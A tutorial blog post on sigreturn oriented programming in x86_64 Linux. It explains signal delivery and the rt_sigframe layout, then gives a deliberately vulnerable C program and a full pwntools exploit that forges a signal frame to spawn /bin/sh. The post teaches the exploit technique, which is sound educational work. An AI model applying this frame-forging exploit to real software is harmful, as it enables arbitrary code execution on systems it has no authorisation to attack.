Sigreturn Oriented Programming
Over the years, many techniques have emerged to exploit the various mechanisms present in software. One of them abuses the signal handling routine of Unix-based operating systems to gain arbitrary code execution.
In this post, I will cover the technique known as sigreturn oriented programming, as well as the properties it possesses which allow us to construct a weird machine. I will elaborate on this term and on the technique later in the post, but first we need a fundamental understanding of what signals are and how they are implemented on Unix-based systems.
Signal Handling
So what are signals, how do they work and what purpose do they serve?
We can think of signals as a limited form of interprocess communication used to notify a process of events or requests. A signal is a software interrupt which is delivered asynchronously to a process to indicate a specific event.
An important distinction to note is how limited signals are compared to other forms of IPC: each signal is essentially a flag indicating an event or behavior, and carries little data beyond that. We can also register our own signal handler programmatically, which lets us run our own callback when the signal arrives.
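To make the idea of a custom handler concrete, here is a minimal sketch using Python's standard signal module. The function and handler names are my own, and the snippet assumes it runs in the main thread of a Unix process (Python only allows handlers to be installed there).

```python
import os
import signal

def send_to_self(sig=signal.SIGUSR1):
    """Install a handler for `sig`, send the signal to ourselves, return what arrived."""
    received = []

    def handler(signum, frame):
        # Called once the signal has been delivered to this process.
        received.append(signum)

    previous = signal.signal(sig, handler)   # register the custom handler
    try:
        os.kill(os.getpid(), sig)            # kill(2) merely *sends* a signal
    finally:
        signal.signal(sig, previous)         # put the old disposition back
    return received

if __name__ == "__main__":
    print(send_to_self())
```

Note that the handler receives nothing but the signal number and the interrupted frame, which illustrates how little information a signal carries.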
The following is a list of the standard signals, along with the POSIX revision that specifies each one and a brief description. It’s not important to know each of these, but it’s good to keep a reference in case one of them is encountered. This table is taken from the signal(7) man page.
Manual page signal(7)
Signal      Standard   Action   Comment
────────────────────────────────────────────────────────────────────────
SIGABRT      P1990      Core    Abort signal from abort(3)
SIGALRM      P1990      Term    Timer signal from alarm(2)
SIGBUS       P2001      Core    Bus error (bad memory access)
SIGCHLD      P1990      Ign     Child stopped or terminated
SIGCLD         -        Ign     A synonym for SIGCHLD
SIGCONT      P1990      Cont    Continue if stopped
SIGEMT         -        Term    Emulator trap
SIGFPE       P1990      Core    Floating-point exception
SIGHUP       P1990      Term    Hangup detected on controlling terminal
                                or death of controlling process
SIGILL       P1990      Core    Illegal Instruction
SIGINFO        -                A synonym for SIGPWR
SIGINT       P1990      Term    Interrupt from keyboard
SIGIO          -        Term    I/O now possible (4.2BSD)
SIGIOT         -        Core    IOT trap. A synonym for SIGABRT
SIGKILL      P1990      Term    Kill signal
SIGLOST        -        Term    File lock lost (unused)
SIGPIPE      P1990      Term    Broken pipe: write to pipe with no
                                readers; see pipe(7)
SIGPOLL      P2001      Term    Pollable event (Sys V);
                                synonym for SIGIO
SIGPROF      P2001      Term    Profiling timer expired
SIGPWR         -        Term    Power failure (System V)
SIGQUIT      P1990      Core    Quit from keyboard
SIGSEGV      P1990      Core    Invalid memory reference
SIGSTKFLT      -        Term    Stack fault on coprocessor (unused)
SIGSTOP      P1990      Stop    Stop process
SIGTSTP      P1990      Stop    Stop typed at terminal
SIGSYS       P2001      Core    Bad system call (SVr4);
                                see also seccomp(2)
SIGTERM      P1990      Term    Termination signal
SIGTRAP      P2001      Core    Trace/breakpoint trap
SIGTTIN      P1990      Stop    Terminal input for background process
SIGTTOU      P1990      Stop    Terminal output for background process
SIGUNUSED      -        Core    Synonymous with SIGSYS
SIGURG       P2001      Ign     Urgent condition on socket (4.2BSD)
SIGUSR1      P1990      Term    User-defined signal 1
SIGUSR2      P1990      Term    User-defined signal 2
SIGVTALRM    P2001      Term    Virtual alarm clock (4.2BSD)
SIGXCPU      P2001      Core    CPU time limit exceeded (4.2BSD);
                                see setrlimit(2)
SIGXFSZ      P2001      Core    File size limit exceeded (4.2BSD);
                                see setrlimit(2)
SIGWINCH       -        Ign     Window resize signal (4.3BSD, Sun)
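If you run into a raw signal number in a debugger or a crash log, a quick lookup helps. The sketch below uses Python's signal.Signals enum; the helper names are mine, and the numbers in the usage note are the Linux values (9 and 11 are the same on every Linux architecture, others such as SIGUSR1 vary).

```python
import signal

def describe(signum):
    """Return the symbolic name for a signal number on this platform."""
    return signal.Signals(signum).name

def catchable(sig):
    """SIGKILL and SIGSTOP can never be caught, blocked or ignored."""
    return sig not in (signal.SIGKILL, signal.SIGSTOP)

if __name__ == "__main__":
    for number in (2, 9, 11, 15):
        sig = signal.Signals(number)
        print(number, sig.name, "catchable" if catchable(sig) else "not catchable")
```

For example, describe(11) gives SIGSEGV on Linux, the signal most people meet first when a payload goes wrong.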
When we want to send a signal to a process, we use the kill system call.
As not all signals signify the termination of a process, the name of the system call can be a bit confusing. The reason is that kill was introduced during the early development of Unix, at a time when the purpose of signals was primarily to kill processes.
Over time various other signals were added to Unix, and the name was retained for backwards compatibility with earlier versions.
When the kernel delivers a signal, it must first perform a (signal) context-switch before it can execute the signal handler (this is not to be confused with the context-switch from user to kernel space due to the system call). The kernel will store the current state and context of the process and write it to the stack in the form of a runtime signal frame structure. We will explore this structure later on due to its relevance in the exploitation of the signal handling mechanism.
However, if the signal handler resides within user space, why is there a need for a context switch?
This is because signals are asynchronous: a signal can arrive between any two instructions, so we can’t simply execute the handler like any other subroutine. The interrupted code has not prepared for a call, which means its entire register state has to be saved when the signal is delivered and restored exactly afterwards.
Once the frame holding the execution context of the running process has been stored on the stack, the process executes the signal handler. When control returns from the handler, sigreturn is called, the context of the process is restored and execution continues.
A more detailed sequence of events is depicted as follows.
- A signal is sent to a process via the kill system call, a hardware exception or some other form of interprocess communication.
- The kernel initially handles the pending signal by calling do_signal, which is responsible for dequeuing the signal and its initial processing. (Permission checks are performed earlier, at the time the signal is sent.)
- Then the kernel calls the function handle_signal, which determines how the signal should be handled. If the developer has registered a custom signal handler, the kernel prepares to call it. Otherwise the default action for that signal is carried out, which for many signals means terminating the process.
- If a signal handler is registered, setup_frame (setup_rt_frame on x86_64) is called. This function saves the current execution context of the process on the stack.
- After this, the kernel transfers control flow to the signal handler. An important thing to keep in mind is that the handler executes in user mode within the same process environment. The kernel never runs user land code itself: SMEP/SMAP would prevent it, and it would not make sense anyway.
Once the signal handler has finished executing, we need some mechanism which restores the previous execution context and resumes the running process. The following is a high level sequence of events which allows for this.
- When a signal handler is finished executing, the system call sigreturn will be invoked.
- A context switch is performed from user space into kernel space due to the system call. The kernel is now responsible for restoring the previous execution context stored on the user space stack.
- Once the process state is restored, the kernel transfers control back to the process and resumes execution.
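The save, handle, restore cycle described above is easy to observe from user space. The following sketch (names are my own) lets a timer signal interrupt a running loop and shows that the computation carries on with its state intact afterwards. One caveat: CPython defers Python-level handlers to a safe point in the interpreter, so this illustrates the observable behavior rather than the exact kernel sequence, which happens underneath in the interpreter's C-level handler.

```python
import signal

def interrupted_sum(limit=100_000):
    """Sum 0..limit-1 while SIGALRM keeps interrupting; return (total, ticks)."""
    ticks = []

    def on_alarm(signum, frame):
        ticks.append(signum)                 # runs asynchronously to the loop

    previous = signal.signal(signal.SIGALRM, on_alarm)
    signal.setitimer(signal.ITIMER_REAL, 0.001, 0.001)   # fire every millisecond
    try:
        total = 0
        i = 0
        while i < limit:                     # the work being interrupted
            total += i
            i += 1
        while not ticks:                     # make sure at least one signal arrived
            pass
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)          # disarm the timer
        signal.signal(signal.SIGALRM, previous)
    return total, len(ticks)

if __name__ == "__main__":
    print(interrupted_sum())
```

The total is always correct no matter how many times the loop was interrupted, which is precisely what the saved context and sigreturn guarantee.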
Signal Frame Structure
Let’s take a closer look at the structures involved in signal handling, specifically struct rt_sigframe. This is the structure which contains the execution context of the running process. The runtime signal frame is stored on the user land stack, which allows an attacker with enough control over the stack to forge a frame through maliciously crafted input.
The following is the definition of the runtime signal frame structure. Keep in mind that the structure is heavily architecture dependent. I will only be covering the structure for modern x86_64 Linux systems.
https://elixir.bootlin.com/linux/latest/source/arch/x86/include/asm/sigframe.h#L57
struct rt_sigframe {
char __user *pretcode;
struct ucontext uc;
struct siginfo info;
/* fp state follows here */
};
The first field of this structure is char __user *pretcode, which holds the return address for the signal handler. Once the handler has finished executing, it returns to the address stored in this field. Keep in mind that the __user annotation denotes an address in user space.
If we view the value at runtime, we can see that it is populated with the address of the symbol __restore_rt. The following is the disassembly of the function within libc.
pwndbg> x/2i 0x00007ffff7de6ab0
0x7ffff7de6ab0 <__restore_rt>: mov rax,0xf
0x7ffff7de6ab7 <__restore_rt+7>: syscall
pwndbg>
The code stub simply loads 0xf (15, the number of the sigreturn system call on x86_64) into rax and executes syscall. When the signal handler returns, it lands on this stub, and sigreturn restores the saved execution context and resumes the running process.
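Since the stub is only nine bytes long, it can be located by searching a binary for its encoding. Here is a small sketch: the byte string is the standard x86_64 encoding of the two instructions shown above, while the helper name and the file name are my own placeholders. The results are file offsets, so they still have to be translated to virtual addresses using the ELF segment headers.

```python
# mov rax, 0xf (48 c7 c0 0f 00 00 00) followed by syscall (0f 05)
RESTORE_RT = bytes.fromhex("48c7c00f000000" "0f05")
SYSCALL = bytes.fromhex("0f05")

def find_all(data, needle):
    """Return every offset in `data` at which `needle` occurs."""
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets

if __name__ == "__main__":
    # "vuln" is a placeholder path for whatever binary you are inspecting.
    with open("vuln", "rb") as fh:
        blob = fh.read()
    print([hex(off) for off in find_all(blob, RESTORE_RT)])
```

The same helper with SYSCALL as the needle lists candidate syscall gadgets, although many hits will sit in the middle of unrelated instructions.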
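The next field, struct ucontext uc, expands into the following structure. Note that the definition linked here is the Alpha variant; on x86_64 the kernel uses the generic definition, which is identical except that it has no uc_osf_sigmask field.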
https://elixir.bootlin.com/linux/latest/source/arch/alpha/include/asm/ucontext.h#L5
#ifndef _ASMAXP_UCONTEXT_H
#define _ASMAXP_UCONTEXT_H
struct ucontext {
unsigned long uc_flags;
struct ucontext *uc_link;
old_sigset_t uc_osf_sigmask;
stack_t uc_stack;
struct sigcontext uc_mcontext;
sigset_t uc_sigmask; /* mask last for extensibility */
};
#endif /* !_ASMAXP_UCONTEXT_H */
This structure stores the user context for the running process. The following is a brief description of each of the structure fields.
- struct ucontext
  - uc_flags: flags describing the saved context, for example whether extended FPU state is present.
  - uc_link: pointer to an execution context which should be resumed when the current context completes, used for user level context switching.
  - uc_osf_sigmask: Alpha only, kept for OSF/1 compatibility. It stores the process signal mask, that is, the collection of signals which are currently blocked.
  - uc_stack: the stack used by the current signal context.
  - uc_mcontext: this structure contains a machine architecture specific snapshot of the execution context.
  - uc_sigmask: the signal mask to restore along with the context.
Let’s take a look at this structure at runtime and examine each of its fields.
pwndbg> p *(struct ucontext_t*) 0x7fffffffd680
$10 = {
uc_flags = 7,
uc_link = 0x0,
uc_stack = {
ss_sp = 0x0,
ss_flags = 2,
ss_size = 0
},
uc_mcontext = {
gregs = {140737488346224, 140737353936240, 8, 514, 0,
140737488346712, 140737354125312, 93824992247256, 2,
140737488345728, 140737488346416, 140737488346696, 0, 0,
140737351936899, 140737488346400, 93824992235913, 518,
12103423998558259, 0, 3, 0, 0},
fpregs = 0x7fffffffd840,
__reserved1 = {3, 140733193388032, 140737488345096,140737488345092,
0, 0, 140737353919659, 4160530904}
},
uc_sigmask = {
__val = {0, 140737488345304, 93824992232647, 140737354131016,
140737353708968, 140737354130112,
466005475, 140737488345344, 140737353958056, 1, 140737353708968,
1, 0, 1, 140737354130112, 140737354131016}
},
__fpregs_mem = {
cwd = 55416,
swd = 65535,
ftw = 32767,
fop = 0,
rip = 140733193388033,
rdp = 140737488345216,
mxcsr = 895,
mxcr_mask = 0,
_st = {{
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {8064, 0, 65535, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}, {
significand = {0, 0, 0, 0},
exponent = 0,
__glibc_reserved1 = {0, 0, 0}
}},
_xmm = {{
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {896, 896, 896, 896}
}, {
element = {896, 896, 896, 896}
}, {
element = {896, 896, 896, 896}
}, {
element = {896, 896, 896, 896}
}, {
element = {2, 0, 14, 2147483648}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}, {
element = {0, 0, 0, 0}
}},
__glibc_reserved1 = {0, 0, 0, 0, 0, 0,
4294957584, 32767, 4160572646, 32767, 4158322872, 32767,
4160694051, 32767, 4160319488, 32767, 110527148, 0, 1179670611,
1092, 31, 0, 1088, 0}
},
__ssp = {0, 0, 0, 3}
}
The primary portion of the user context structure is held within the field struct sigcontext uc_mcontext. This structure holds the saved registers and execution state. What follows is the definition of the structure; the linked version is again the Alpha one, so its fields differ from the x86_64 registers shown in the debugger output further down.
https://elixir.bootlin.com/linux/latest/source/arch/alpha/include/uapi/asm/sigcontext.h#L5
#ifndef _ASMAXP_SIGCONTEXT_H
#define _ASMAXP_SIGCONTEXT_H
struct sigcontext {
/*
* What should we have here? I'd probably better use the same
* stack layout as OSF/1, just in case we ever want to try
* running their binaries..
*
* This is the basic layout, but I don't know if we'll ever
* actually fill in all the values..
*/
long sc_onstack;
long sc_mask;
long sc_pc;
long sc_ps;
long sc_regs[32];
long sc_ownedfp;
long sc_fpregs[32];
unsigned long sc_fpcr;
unsigned long sc_fp_control;
unsigned long sc_reserved1, sc_reserved2;
unsigned long sc_ssize;
char * sc_sbase;
unsigned long sc_traparg_a0;
unsigned long sc_traparg_a1;
unsigned long sc_traparg_a2;
unsigned long sc_fp_trap_pc;
unsigned long sc_fp_trigger_sum;
unsigned long sc_fp_trigger_inst;
};
#endif
Keep in mind that the implementation of this structure (as well as various others) differs between platforms and architectures to meet their specific requirements.
Let’s take a look at the x86_64 version of this structure at runtime to view the contents of each saved register.
pwndbg> p*(struct sigcontext *)(*(struct ucontext_t*)0x7fffffffd680).uc_mcontext
$9 = {
r8 = 0,
r9 = 0,
r10 = 3849470367813,
r11 = 3848290698112,
r12 = 3848290698112,
r13 = 3848290698112,
r14 = 3848290698112,
r15 = 3848290698112,
rdi = 3848290698112,
rsi = 3848290698112,
rbp = 2,
rbx = 9223372036854775822,
rdx = 0,
rax = 0,
rcx = 0,
rsp = 0,
rip = 0,
eflags = 0,
cs = 0,
gs = 0,
fs = 0,
__pad0 = 0,
err = 3216465788709089792,
trapno = 1,
oldmask = 93824992235913,
cr2 = 140737488346696,
{
fpstate = 0x1f7ffdab0,
__fpstate_word = 8455707312
},
__reserved1 = {1, 140737351845968, 140737488346672,
93824992235878, 5726617664, 140737488346696,
140737488346696, 10445461255472785543}
}
pwndbg>
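When forging a frame by hand it helps to know exactly where each register sits. The sketch below models the x86_64 layout with ctypes and computes offsets relative to pretcode. The class and helper names are mine; the field order follows the kernel's x86_64 sigcontext, where the 16-bit slot that gdb prints as __pad0 is named ss. Pointers are modelled as plain 64-bit integers so the numbers come out the same on any host.

```python
import ctypes

U64 = ctypes.c_uint64

class StackT(ctypes.Structure):
    _fields_ = [("ss_sp", U64), ("ss_flags", ctypes.c_int32),
                ("_pad", ctypes.c_int32), ("ss_size", U64)]

class Sigcontext(ctypes.Structure):
    _fields_ = (
        [(reg, U64) for reg in (
            "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
            "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp",
            "rip", "eflags")]
        + [(seg, ctypes.c_uint16) for seg in ("cs", "gs", "fs", "ss")]
        + [(name, U64) for name in ("err", "trapno", "oldmask", "cr2", "fpstate")]
        + [("reserved1", U64 * 8)]
    )

class Ucontext(ctypes.Structure):
    _fields_ = [("uc_flags", U64), ("uc_link", U64), ("uc_stack", StackT),
                ("uc_mcontext", Sigcontext), ("uc_sigmask", U64)]

class RtSigframe(ctypes.Structure):
    # struct siginfo and the FP state follow, but are not needed for offsets.
    _fields_ = [("pretcode", U64), ("uc", Ucontext)]

def frame_offset(reg):
    """Byte offset of a saved register, measured from pretcode."""
    return (RtSigframe.uc.offset + Ucontext.uc_mcontext.offset
            + getattr(Sigcontext, reg).offset)

if __name__ == "__main__":
    for reg in ("rdi", "rax", "rsp", "rip", "cs", "fpstate"):
        print(f"{reg:8} +{frame_offset(reg)}")
```

With this layout the saved rip lives 176 bytes past pretcode, which is a handy sanity check when a hand-built frame misbehaves.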
Now let’s view the last field present within the runtime signal frame, struct siginfo info. This field holds various information about the signal which was delivered to the process. The following is the expanded definition of the structure.
typedef struct siginfo {
union {
struct {
int si_signo;
int si_errno;
int si_code;
union __sifields _sifields;
};
int _si_pad[SI_MAX_SIZE/sizeof(int)];
};
} __attribute__((aligned(8))) siginfo_t;
The first field, si_signo, holds the signal number. The next field, si_errno, may hold an error code if the signal was generated due to an error condition. The field si_code provides additional information about the specific event which triggered the signal; its meaning depends on the type of signal. The field _sifields is a union which typically contains information such as the sender’s process and user identifiers. I will not elaborate further on this structure as it’s not relevant to the technique.
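These siginfo fields can be inspected without writing any C. The sketch below, with a function name of my own, blocks a signal, sends it to the current process and dequeues it with signal.sigtimedwait, which returns the accompanying siginfo. It assumes Linux and a single-threaded process, since a process-directed signal could otherwise be delivered to another thread.

```python
import os
import signal

def wait_for_own_signal(sig=signal.SIGUSR1):
    """Send `sig` to ourselves and return the siginfo the kernel queued with it."""
    # Block the signal so it stays pending instead of being delivered.
    old_mask = signal.pthread_sigmask(signal.SIG_BLOCK, {sig})
    try:
        os.kill(os.getpid(), sig)
        # Dequeue the pending signal together with its siginfo (None on timeout).
        return signal.sigtimedwait({sig}, 1.0)
    finally:
        signal.pthread_sigmask(signal.SIG_SETMASK, old_mask)

if __name__ == "__main__":
    info = wait_for_own_signal()
    print(info.si_signo, info.si_errno, info.si_code, info.si_pid, info.si_uid)
```

For a signal sent with kill, si_code is 0 (SI_USER) and si_pid identifies the sender, which here is the process itself.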
Sigreturn Oriented Programming
The technique known as SROP exploits the signal handling mechanism: the execution context is stored on the user space stack, and the kernel has no means of verifying whether a runtime signal frame is legitimate.
Thanks to this, an attacker with enough control over the stack can forge a malicious runtime signal frame for the kernel to load. To do so, we need the ability to invoke the sigreturn system call, which can be achieved in several ways.
One such method is via return oriented programming. If there is a syscall ROP gadget present within the binary and we can control the rax register, we can leverage it to invoke sigreturn.
On older versions of Linux, a usable gadget also exists in the vsyscall page, which the kernel mapped at a fixed address into every user space process as an optimization for certain system calls. This legacy mechanism, the predecessor of the vDSO, has been deprecated in newer versions of Linux.
Using this technique, we can leverage the signal handling routine to populate each and every register with whatever value we want. The following is a vulnerable program which we will exploit using SROP.
// gcc -w -static -no-pie -fno-stack-protector -o vuln vuln.c
#include <stdio.h>
#include <unistd.h>
int foo(char* buffer) {
return read(0, buffer, 1024);
}
int main(int argc, char** argv) {
char buffer[128];
printf("Bytes read into buffer: %d\n", foo((char *)&buffer));
puts("Good luck on calling /bin/sh");
return 0;
}
For the sake of simplicity, we compile the binary statically and without position independent code (PIE). This allows us to use the __restore_rt gadget, which would typically be held within libc, to call sigreturn, and gives us access to the string /bin/sh. It makes the example much easier to comprehend and work with, as we won’t have to worry about obtaining leaks and calculating offsets.
We also disable the stack canary, as we need to be able to write over the stack to forge our fake runtime signal frame. Keep in mind that we don’t actually need to send a signal; we can just craft a fake frame and then invoke sigreturn so that the kernel restores the execution context from it.
The last little cheat that the program provides us is the /bin/sh\x00 string. As this string is no longer present in recent versions of statically compiled binaries, simply using a string within .rodata is much easier than having to write our own to a known writable region of memory.
What follows is the high level sequence of events taken to gain a shell on the binary.
- Calculate the offset of the return address of the binary.
- Find the important addresses in memory: the /bin/sh string, the __restore_rt symbol for our return address, and a syscall gadget for the instruction pointer.
- Craft a fake signal frame which populates the registers with the appropriate arguments to spawn a shell with execve.
- Craft the final payload with padding and the forged runtime signal frame.
First and foremost, let’s calculate the offset of the return address.
─────────────────────────────[ BACKTRACE ]─────────────────────────────
► f 0 0x401838 main+79
f 1 0x6161616161616172
f 2 0x6161616161616173
f 3 0x6161616161616174
f 4 0x6161616161616175
f 5 0x6161616161616176
f 6 0x6161616161616177
f 7 0x6161616161616178
───────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l raaaaaaa
Finding cyclic pattern of 8 bytes: b'raaaaaaa' (hex: 0x7261616161616161)
Found at offset 136
pwndbg>
So now we know that the offset is 136 bytes, and the return address sits directly after this padding. From here, we need some means of invoking the sigreturn system call. Thankfully the __restore_rt symbol is statically linked into the binary itself, so we can use that as our gadget. Keep in mind that the first field of the signal frame, pretcode, effectively serves as the return address.
From here we can populate the signal frame with whatever values we want. In this case, we want to call execve("/bin/sh", 0, 0), so rax must hold 59 (the execve system call number), rdi the address of the string, and rsi and rdx zero. Once sigreturn has loaded these registers, execution resumes at the restored rip, which we point at a syscall gadget in order to execute execve.
When forging a fake signal frame, we need to be careful not to populate fields with bad values which could crash our process. There are a few requirements which must be met in order to forge a valid frame; they are as follows.
- The code segment (CS) register must be correctly restored; on x86_64 this register contains the value 0x33.
- The fpstate field should not hold a random pointer and should be null. When this field is null, Linux assumes there is no floating point state to restore and clears the FPU state.
The rest of the fields that were not mentioned were populated with the values shown at runtime by the debugger.
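To make these requirements harder to get wrong, the frame can be assembled by a small helper instead of by hand. The following is a standard-library sketch, not the code used for the exploit in this post: build_frame and its keyword interface are hypothetical, it stops at fpstate, and it has not been run against the target binary. It hard-codes the constraints listed above (cs set to 0x33, fpstate null) and borrows the uc_flags, eflags and ss values from this post.

```python
import struct

GPRS = ("r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
        "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp",
        "rip", "eflags")

def build_frame(pretcode, **regs):
    """Pack pretcode plus a forged ucontext, up to and including fpstate."""
    unknown = set(regs) - set(GPRS)
    if unknown:
        raise ValueError(f"unknown registers: {sorted(unknown)}")
    values = dict.fromkeys(GPRS, 0)
    values["eflags"] = 0x202                        # value used in this post
    values.update(regs)
    frame = struct.pack("<Q", pretcode)             # return address
    frame += struct.pack("<5Q", 7, 0, 0, 0, 0)      # uc_flags, uc_link, uc_stack
    frame += struct.pack("<18Q", *(values[r] for r in GPRS))
    frame += struct.pack("<4H", 0x33, 0, 0, 0x2b)   # cs, gs, fs, ss
    frame += struct.pack("<5Q", 0, 0, 0, 0, 0)      # err, trapno, oldmask, cr2, fpstate
    return frame

if __name__ == "__main__":
    # Addresses are the ones found for the example binary in this post.
    frame = build_frame(0x462170, rax=59, rdi=0x475035, rip=0x4011b8)
    payload = b"A" * 136 + frame
    print(len(frame), len(payload))
```

Rejecting unknown register names catches typos such as rpi early, which would otherwise silently leave rip at zero.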
The full exploit code is shown below.
#!/usr/bin/env python3
from pwn import *
p = ELF('vuln', checksec=0).process(env={})
bin_sh = 0x00475020+21
restore_rt = 0x00462170
syscall = 0x00000000004011b8
sigframe = p64(restore_rt) # pretcode (return address)
sigframe += p64(0x0000000000000007) # uc_flags
sigframe += p64(0) # uc_link
sigframe += p64(0) # uc_stack.ss_sp
sigframe += p64(0x0000ffff00000000) # uc_stack.ss_flags
sigframe += p64(0) # uc_stack.ss_size
sigframe += p64(0)*8 # r8-r15
sigframe += p64(bin_sh) # rdi
sigframe += p64(0) # rsi
sigframe += p64(0) # rbp
sigframe += p64(0) # rbx
sigframe += p64(0) # rdx
sigframe += p64(59) # rax
sigframe += p64(0) # rcx
sigframe += p64(0) # rsp
sigframe += p64(syscall) # rip
sigframe += p64(0x0000000000000202) # eflags
sigframe += p64(0x002b000000000033) # cs=0x33, gs=0, fs=0, ss=0x2b (low to high)
sigframe += p64(0) # err
sigframe += p64(1) # trapno
sigframe += p64(0)*3 # oldmask, cr2, fpstate (null)
sigframe += p64(0xe) # __reserved1[0]
sigframe += p64(0) # __reserved1[1]
offset=136
payload = b'A'*offset
payload += sigframe
pause()
p.send(payload)
p.interactive()
Conclusion
In summary, sigreturn oriented programming is a technique typically used to populate registers for the goal of arbitrary code execution by forging a runtime signal frame and exploiting the signal handling mechanism on Unix based systems.
Below is a list of additional resources which I used as references while writing this post. I highly recommend going through the original paper on this technique.
Thanks for reading!
Additional Resources
https://www.cs.vu.nl/~herbertb/papers/srop_sp14.pdf
https://tc.gtisc.gatech.edu/bss/2014/r/srop-slides.pdf
https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
https://lwn.net/Articles/676803/